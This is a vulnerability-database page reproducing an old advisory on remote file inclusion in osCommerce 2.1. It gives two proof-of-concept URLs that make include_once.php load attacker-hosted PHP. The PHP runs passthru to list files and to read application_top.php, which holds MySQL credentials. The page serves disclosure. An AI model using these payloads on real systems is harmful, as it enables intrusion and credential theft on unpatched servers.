Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2002-2019 CVE-2002-1991

Publish Date: 16 Jun 2002

                							

                source: http://www.securityfocus.com/bid/5037/info

osCommerce is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. 

-------- Example 1 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/a.php

--- a.php ---
&lt;? passthru("/bin/ls")?&gt;
-------------
Output: dir listing of the current dierctory
---------------------------

-------- Example 2 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/b.php

--- b.php ---
&lt;? passthru("/bin/cat application_top.php")?&gt;
-------------
Output: outputs the application_top.php file wich includes MySQL username,
password, etc.

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

osCommerce 2.1 - Remote File Inclusion

Vulmon Search

About

Products

Connect